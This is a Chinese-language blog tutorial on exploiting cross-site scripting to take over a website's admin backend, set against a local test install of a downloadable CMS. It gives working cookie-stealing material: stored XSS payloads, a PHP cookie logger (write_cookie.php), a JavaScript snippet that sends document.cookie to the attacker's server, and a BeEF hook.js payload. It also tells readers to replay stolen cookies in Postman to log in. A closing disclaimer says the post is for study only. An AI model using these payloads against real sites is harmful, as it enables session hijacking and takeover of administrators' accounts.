xss跨站攻击详讲 | 如何利用xss拿下一个站?
目录
1.初识xxs跨站漏洞
xss能干什么?
利用xss获取对方后台地址、cookie信息,得到cookie和后台地址后,能通过相关工具(比如postman)进行后台登录:
其他补充:
cookie :一般用于小中型网站,一般存储在自己电脑上,存活时间较长
session:采用会话模式,一般用于大型网站,一存储在服务器上,存活时间较短
2.xss的类型
2.1反射型
当在网页插入下列xss代码后,会立即回馈到屏幕,但这条xss代码并不会一直存储到该网站上
<script>alert(1)</script>
提交后返回:
2.2存储型
利用xss跨站漏洞,基本都是建立在存储型上,其他类型只作了解
例如留言板、评论、订单信息、反馈等,能一直留在后台上
2.3DOM型
采用JavaScript进行处理,保存在前端
这句代码并不包含攻击性,可以用来测试是否有xss漏洞
<script>alert(1)</script>
同时,也可以改成带攻击的代码,进行窃取cookie
3.测试环境搭建
3.1搭建测试网站
首先下载军锋真人cs野战的源码:
http://js.down.chinaz.com/201202/jfdd_v2.0.zip
解压到网站目录,访问网站地址127.0.0.1/jfdd/install.php
进行一步步安装即可(后台密码也在这儿设置)
设置好能够登录网站后台,表示初始化成功
3.2获取xss攻击代码
在xss平台注册账号,并创建好项目:
https://xss8.cc/
创建项目配置代码这块可以根据自己的需求勾选,我这里只勾选了默认
配置好后,点击查看代码
我们这里随便选取一条代码即可
4.实战演示
随便选择一条代码,放到登录界面任意位置,点击提交即可
这时候,只要网站管理员登录到后台查看了这条信息,就可以截取到对方的cookie值。
模拟管理员登录后台,并查看此条信息
在xxs平台即可看到截获的cookie
只要获取到完整的cookie数据,我们就可以利用工具进行连接登录到后台,(完整cookie包括cookie和session,但是一般xss平台是截取不到session的,所以请读者另想办法,思路:获取phpinfo中的cookie)
然后我们使用postman进行连接登录后台即可
5.利用自定义xss获取cookie
1.在web服务器上创建一个write_cookie.php文件
write_cookie.php代码如下
<?php
$cookie=$_GET['c'];
$str=fopen('cookie.txt','w');
fwrite($str,"$cookie");
fclose($str);
?>
代码解释
$cookie=$_GET['c'];获取链接中c参数的值
其他代码就打开并写入到cookie.txt文件中
2.在web服务器端创建send_cookie.js文件
代码如下:
其中src的地址为自己服务器的地址
new Image().src="http://127.0.0.1/write_cookie.php?c=" + encodeURI(document.cookie);
构造payload
<script src=http://127.0.0.1/send_cookie.js></script>
将构造好的payload插入到测试点中
当管理员登录到后台查看此订单时,将会将管理员cookie数据发送到web服务器
查看服务器,收到了cookie数据
6.beef工具实现xss
beef安装教程:
https://blog.csdn.net/weixin_43148062/article/details/105601649
配置好beef之后,写一个payload,src为beef的服务器地址(在beef配置文件中可以看到)
<script src="//127.0.0.1:3000/hook.js"></script>
和之前的步骤一样,将payload写入测试站
登录beef后台,当测试站管理员登录并查看信息后,beef后台将会有主机上线(xx号已上机~欢迎您的使用[doge])
使用beef获取网站cookie
beef的功能很强大,这里仅示范一个获取cookie的操作,其他请读者自行探索!
xss相关补充文章:
== 你知道吗,你用的大马可能早就被别人装后门了!!==
如何检查自己用的大马是否被写了后门?如何利用xss反杀别人写了后门的大马?
欢迎继续阅读下篇文章:“黑吃黑”的webshellbox
本篇文章仅作技术学习研究,切勿拿来行坏事!!任何违法操作都与本文作者无关。